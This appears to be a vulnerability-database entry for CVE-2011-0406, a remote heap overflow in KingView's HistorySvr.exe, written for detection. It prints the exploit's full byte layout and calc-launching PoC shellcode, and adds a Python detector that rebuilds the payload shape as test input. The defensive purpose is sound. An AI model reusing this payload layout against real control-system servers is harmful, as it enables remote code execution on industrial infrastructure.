CVE-2011-0406
Published: 2011-01-11

CVE-2011-0406: Heap-based buffer overflow in HistorySvr.exe in WellinTech KingView 6.53 allows remote attackers to execute arbitrary code via a long request to TCP port 777.
Priority: P2 (69) · CVSS 2.0 base score: 10.0 (critical)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: public PoC available (see references)
EPSS: 20.94% (97.2th percentile)
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wellintech | kingview | — | — |
Detection & IOCs (extracted from sources)

- Exploit payload layout (bytes): \x90 * 1024 + \x44 * 31788 + \xeb\x14 + \x44 * 6 + \xad\xbb\xc3\x77 + \xb4\x73\xed\x77
  (1024-byte NOP sled, 31788 bytes of 0x44 filler, a jmp short +0x14, six more filler bytes, then two little-endian pointers, 0x77c3bbad and 0x77ed73b4, used for the Flink/Blink overwrite)
- PoC shellcode (bytes): \x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9\x44\x80\xc2\x77\xFF\xD1\x90\x90
  (xor eax,eax; push eax; push "calc"; push esp; pop ebx; push eax; push ebx; mov ecx,0x77c28044; call ecx; nop; nop: the arguments match a WinExec("calc", 0) call through a hard-coded kernel32 address, so the PoC is tied to one specific Windows build)
- Monitor for large TCP requests (>32KB payload) to port 777 targeting HistorySvr.exe; the exploit sends 1024 NOP bytes followed by 31788 bytes of 0x44, a distinctive oversized request pattern that a legitimate client has no reason to produce.
- HistorySvr.exe listens on TCP port 777 and requires no authentication; any inbound connection to this port from an external or untrusted host should be treated as suspicious, and the port should not be reachable from outside the control network at all.
- Look for heap-corruption indicators in HistorySvr.exe crash telemetry: EAX=0x42424242 and ECX=0x44444444 are attacker-supplied filler values that end up in the Flink/Blink pointers when the corrupted heap chunk is unlinked, so a crash with register values made of repeated 0x42/0x44 bytes is a strong sign of an exploit attempt rather than a random fault.
- Detect exploit attempts by looking for the jmp short opcode sequence 0xEB 0x14 embedded within a large block of 0x44 bytes in a TCP/777 stream; this is the exploit's heap-overwrite pivot and does not depend on the shellcode chosen.
- The shellcode in the PoC only launches calc.exe (proof of concept); real-world attacks would substitute arbitrary shellcode, so byte-for-byte shellcode matching alone is insufficient for detection. Match on the structural indicators above (size, NOP sled, 0x44 filler, the EB 14 pivot, the pointer pair) instead.
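As an added example (not code from the page, the PoC author or the vendor), the following Python turns the indicators above into a scorer for a single inbound TCP request. `build_poc_shaped_payload` reconstructs only the byte layout listed in the IOCs (NOP sled, 0x44 filler, EB 14 pivot, pointer pair) and appends a caller-chosen tail in place of shellcode, so it is a constructed test input, not the exploit. The 1024-byte filler-run threshold and the 64-byte context required around EB 14 are assumptions chosen here, not values from the page.

```python
import re
from typing import Dict, List

HISTORYSVR_PORT = 777
OVERSIZED_BYTES = 32 * 1024      # page: "large TCP connections (>32KB payload)"
MIN_FILL_RUN = 1024              # assumed threshold for a reportable 0x44 run
PIVOT_CONTEXT = 64               # assumed: 0x44 bytes required before EB 14

NOP = b"\x90"
FILL = b"\x44"
JMP_SHORT_14 = b"\xeb\x14"       # jmp short +0x14, the pivot named in the IOCs
# Little-endian pointer pair from the PoC layout listed on this page
POC_POINTER_PAIR = b"\xad\xbb\xc3\x77" + b"\xb4\x73\xed\x77"

FILL_RUN = re.compile(rb"\x44{1024,}")


def build_poc_shaped_payload(tail: bytes = b"") -> bytes:
    """Constructed sample following the layout from the IOC list. `tail`
    stands in for whatever shellcode an attacker appends; no real shellcode
    is included."""
    return (NOP * 1024 + FILL * 31788 + JMP_SHORT_14 + FILL * 6
            + POC_POINTER_PAIR + tail)


def _pivot_in_filler(payload: bytes) -> bool:
    """True if EB 14 appears with PIVOT_CONTEXT bytes of 0x44 before it and
    at least one 0x44 after it (scan, not regex, to avoid quadratic
    backtracking over a 30 KB filler run)."""
    pos = payload.find(JMP_SHORT_14)
    while pos != -1:
        before = payload[max(0, pos - PIVOT_CONTEXT):pos]
        after = payload[pos + 2:pos + 3]
        if before == FILL * PIVOT_CONTEXT and after == FILL:
            return True
        pos = payload.find(JMP_SHORT_14, pos + 1)
    return False


def inspect_historysvr_request(dst_port: int, payload: bytes) -> Dict[str, object]:
    """Score one inbound request against the CVE-2011-0406 indicators.
    Size alone is weak evidence; the verdict requires a layout indicator."""
    findings: List[str] = []
    if dst_port != HISTORYSVR_PORT:
        return {"suspicious": False, "findings": findings}

    oversized = len(payload) > OVERSIZED_BYTES
    nop_sled = payload.startswith(NOP * 1024)
    longest_fill = max((len(m.group(0)) for m in FILL_RUN.finditer(payload)), default=0)
    pivot = _pivot_in_filler(payload)
    pointers = POC_POINTER_PAIR in payload

    if oversized:
        findings.append(f"oversized request: {len(payload)} bytes")
    if nop_sled:
        findings.append("1024-byte NOP sled at start of request")
    if longest_fill:
        findings.append(f"0x44 filler run of {longest_fill} bytes")
    if pivot:
        findings.append("jmp short (EB 14) embedded in 0x44 filler")
    if pointers:
        findings.append("PoC Flink/Blink pointer pair present")

    suspicious = bool(pivot or pointers or (oversized and (nop_sled or longest_fill)))
    return {"suspicious": suspicious, "findings": findings}


if __name__ == "__main__":
    # Constructed inputs: the PoC layout, the same layout with a different
    # tail (the L24 point), a small benign-looking request, and a big but
    # structureless request.
    samples = {
        "poc layout": build_poc_shaped_payload(),
        "poc layout, other tail": build_poc_shaped_payload(b"\xcc" * 64),
        "small request": b"\x01\x00\x00\x10query\x00",
        "big but unstructured": b"A" * 40000,
    }
    for name, data in samples.items():
        print(name, inspect_historysvr_request(HISTORYSVR_PORT, data))
```

Because the verdict keys on the layout (NOP sled, filler, pivot, pointer pair) rather than on the calc.exe shellcode bytes, swapping the tail for any other payload still trips the detector, while an oversized request with none of that structure is reported but not flagged.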
No detection rules found.
No writeups or analysis indexed.
References:
- http://osvdb.org/70366
- http://secunia.com/advisories/42851
- http://securityreason.com/securityalert/8134
- http://thesauceofutterpwnage.blogspot.com/2011/01/waking-up-sleeping-dragon.html
- http://www.cnnvd.org.cn/showCnnvd.html?id=2011010108
- http://www.exploit-db.com/exploits/15957
- http://www.kb.cert.org/vuls/id/180119
- http://www.kingview.com/news/detail.aspx?contentid=528
- http://www.securityfocus.com/bid/45727
- http://www.vupen.com/english/advisories/2011/0063
- https://exchange.xforce.ibmcloud.com/vulnerabilities/64559